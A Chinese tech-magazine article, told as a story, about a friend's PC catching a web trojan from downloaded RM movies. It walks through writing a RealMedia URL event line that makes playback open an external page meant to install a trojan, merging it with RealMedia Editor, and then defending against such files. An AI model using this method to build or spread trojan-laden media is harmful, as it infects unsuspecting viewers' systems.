五一期间,到处都人满为患,我还是选择在家度过不长不短的七天长假,其实和我有同样安排的人有很多,比如佳佳MM就是如此。为了缓解前段时间工作的压力,她打算安安静静地呆在家里哪也不去,准备和各种各样的大片一同度过,正所谓“五一七天乐,在家也快乐”。文章五一刚过了两天,第三天一大早醒来,我突然接到了佳佳MM的求助电话。“东渝哥哥,我想给你商量一件事,今天中午我请你吃饭好吗?”这样一句话使得躺在床上的我以为自己在做梦,连掐了自己几下。“难道是鸿门宴!要知道以前我请她吃饭,都不肯赏脸,今天居然请我吃饭,一定是有求于我。”果然不出所料,在吃饭的时候,佳佳MM说自己的系统可能中了木马程序,让他帮忙看看。吃人嘴短,没有办法,吃完饭后我来到MM家里。在认真查看了系统的进程后,发现一个可疑的“iexplore.exe”进程。“这不是IE浏览器的进程吗,我没有运行啊,怎么会有这个进程呢?”我的心中泛起了疑惑,“看来你的系统一定是中了某种木马程序,IE浏览器是被它调用的。”“我这几天除了下载了三部电影,什么也没有下载啊!”MM说道。于是我对这三部电影进行检查,发现果然不出所料,里面有一些奇怪的链接。看来是中了网页木马,这个简单,找到这个网页,然后对症下药,清除掉系统中的木马。“看几部电影就会中木马?”佳佳MM不解地问道。TW.WINgWIT.cOM“你不是说只有RealPlayer播放器的用户才会中木马的吗?我用的可是MPC啊,怎么也中木马了呢?”我只好解释:“以前是只有RealPlayer播放器才能中网页木马的,可现在的入侵方法日新月异,简直是防不胜防啊。正好今天有空,给你露一手,看看入侵者如何在RM文件中加入恶意代码的。”说做就做,马上动手给MM演示。再现RM木马恶作剧“由于RM文件是网络上最常用的多媒体文件类型之一,所以通过这种方法进行网页木马的传播,可以让受危害的用户面更加的广。其实这种方法最早是用于传播网络广告的,而现在已经被入侵者利用,并且给普通的RM文件加入网页木马的链接的操作也并不复杂,通过一些现成的工具就可以完成,比如Helix Producer Plus、RealMedia Editor。”我给MM先介绍一下。“首先要准备一个RM视频文件作为网页木马传播的原材料,最好有一些吸引人的内容,不然受害者就不会观看到木马触发的那个时间段。另外还有一个好处就是,当用户津津有味地观看电影的时候,是不会在乎弹出的网页的。”我补充了一下。我首先打开记事本程序,新建一个文本文件,在上面输入下面一段代码,然后将其保存为mm.txt:u 00:00:20.0 00:00:30.0 &&_rpexternal&&http://www.cpcw.com/test.htm我来解释一下这段代码的意思。其中u是事件标志(Flag),表示要在文件中插入的是一个URL地址。接着第三个字段表示起止时间点,单位格式是“小时:分:秒.毫秒”,最后一个字段是你要弹出的URL的地址,“ _rpexternal”参数表示在外部浏览器打开URL,而不是使用缺省的Realplayer内嵌的浏览器打开URL。这里表明当播放到第20秒或者将播放进度拖到第20秒至30秒之间的任意时间时,RM文件都会自动调用系统默认的浏览器打开“http://www.cpcw.com/test.htm”的这个网页链接,从而将木马程序安装到用户的系统中。接着我运行RM视频文件编辑工具RealMedia Editor,点击“文件”菜单下的“打开Real媒体文件”命令来打开先前准备好的那段正常的RM视频文件,然后点击“工具”菜单下的“合并事件”命令,选择刚才保存的那个文本文件。最后点击“文件”菜单下的“RealMedia文件另存为”命令,将它另存为一个全新的RM文件,这样一个携带了网页木马的RM文件就制作完成了。为MM支招对于这种恶意的RM文件的防范,不同的情况可以采用不同的方法。对于那些可以下载到硬盘中的RM文件,我们可以通过一款名为“Real 媒体过滤器”的软件对可疑的RM文件进行处理,将其中可能包含的一些外加的网页链接和特效去除掉。运行“Real 媒体过滤器”,在“源文件”和“另存为”选项后进行相应的设置,然后点击“开始过滤”按钮就可去除可疑RM文件中的多余链接(如图2)。过滤完成后,程序会弹出一个对话框并提示过滤的内容。另外,如果用户使用MPC进行播放的话,可以把Real媒体文件的解码类型设置为DirectShow即可,因为使用DirectShow格式可以自动屏蔽掉这些广告。但因为RM文件是Real公司的独家格式,所以DirectShow格式对于一些特殊的RM文件不能解码。这时就只有使用RealMedia格式进行播放了,但自动屏蔽广告的功能将失效。最后提醒广大可爱的MM,及时到微软网站去下载最新的安全补丁,堵住系统以及软件的漏洞;安装最新的反病毒软件并及时更新病毒库;安装网络防火墙,封堵不需要的端口,并对试图连接互联网的进程进行认真的筛选。